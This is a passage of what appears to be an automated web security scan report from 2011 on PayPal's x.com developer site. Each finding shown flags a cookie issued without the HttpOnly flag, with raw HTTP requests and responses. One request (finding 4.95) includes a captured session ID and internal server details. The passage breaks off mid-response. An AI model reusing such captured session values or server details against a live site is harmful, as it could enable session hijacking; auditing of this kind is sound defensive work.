GET /community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363133383b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=99334 t=1313157086694004
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.89. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323232363b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=79734 t=1313157086409698
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.90. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=108461 t=1313157085908464
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.91. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323232363b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:25 GMT; Path=/
Vary: User-Agent
JP: D=96364 t=1313157085618096
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.92. https://www.x.com/docs/DOC-1031

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1031

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1031 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313033313b3130322c313337323b3130322c313035313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:48 GMT; Path=/
Vary: User-Agent
JP: D=96847 t=1313157228488141
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.93. https://www.x.com/docs/DOC-1041

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1041

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1041 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313333323b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:07 GMT; Path=/
Vary: User-Agent
JP: D=129414 t=1313157247469487
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.94. https://www.x.com/docs/DOC-1051

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1051

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1051 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313035313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:48 GMT; Path=/
Vary: User-Agent
JP: D=159037 t=1313157228026431
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.95. https://www.x.com/docs/DOC-1106

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1106 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/button_manager
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c313130363b3130322c333831313b332c38383139383b332c3133383934323b332c38373839383b332c3134303532383b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b; Expires=Sun, 11-Sep-2011 13:40:10 GMT; Path=/
Vary: User-Agent
JP: D=139511 t=1313156410450395
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.96. https://www.x.com/docs/DOC-1108

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1108

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1108 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b3130322c333335323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:06 GMT; Path=/
Vary: User-Agent
JP: D=99860 t=1313157246030665
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.97. https://www.x.com/docs/DOC-1116

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1116

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1116 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:12 GMT; Path=/
Vary: User-Agent
JP: D=130471 t=1313157252790233
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.98. https://www.x.com/docs/DOC-1176

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1176

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1176 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313130363b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:15 GMT; Path=/
Vary: User-Agent
JP: D=129417 t=1313157255561975
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.99. https://www.x.com/docs/DOC-1204

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1204

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1204 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:13 GMT; Path=/
Vary: User-Agent
JP: D=312167 t=1313157253541541
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.100. https://www.x.com/docs/DOC-1216

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1216

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1216 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:12 GMT; Path=/
Vary: User-Agent
JP: D=91982 t=1313157252137257
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.101. https://www.x.com/docs/DOC-1332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1332

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1332 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313333323b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:06 GMT; Path=/
Vary: User-Agent
JP: D=140843 t=1313157246673403
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.102. https://www.x.com/docs/DOC-1372

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1372

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1372 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313337323b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=87320 t=1313157227528974
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.103. https://www.x.com/docs/DOC-1374

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1374

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1374 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313337343b3130322c313333323b3130322c313130383b3130322c313034313b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:08 GMT; Path=/
Vary: User-Agent
JP: D=92665 t=1313157248423211
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.104. https://www.x.com/docs/DOC-1401

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1401

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1401 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313430313b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313230343b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:14 GMT; Path=/
Vary: User-Agent
JP: D=292571 t=1313157254169391
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.105. https://www.x.com/docs/DOC-1431

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1431

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313433313b3130322c313333323b3130322c313337343b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:09 GMT; Path=/
Vary: User-Agent
JP: D=208093 t=1313157248979182
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.106. https://www.x.com/docs/DOC-1551

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1551

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1551 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313535313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333335313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335343b3130322c333335353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:03 GMT; Path=/
Vary: User-Agent
JP: D=196106 t=1313157243446476
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.107. https://www.x.com/docs/DOC-1613

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1613

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1613 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
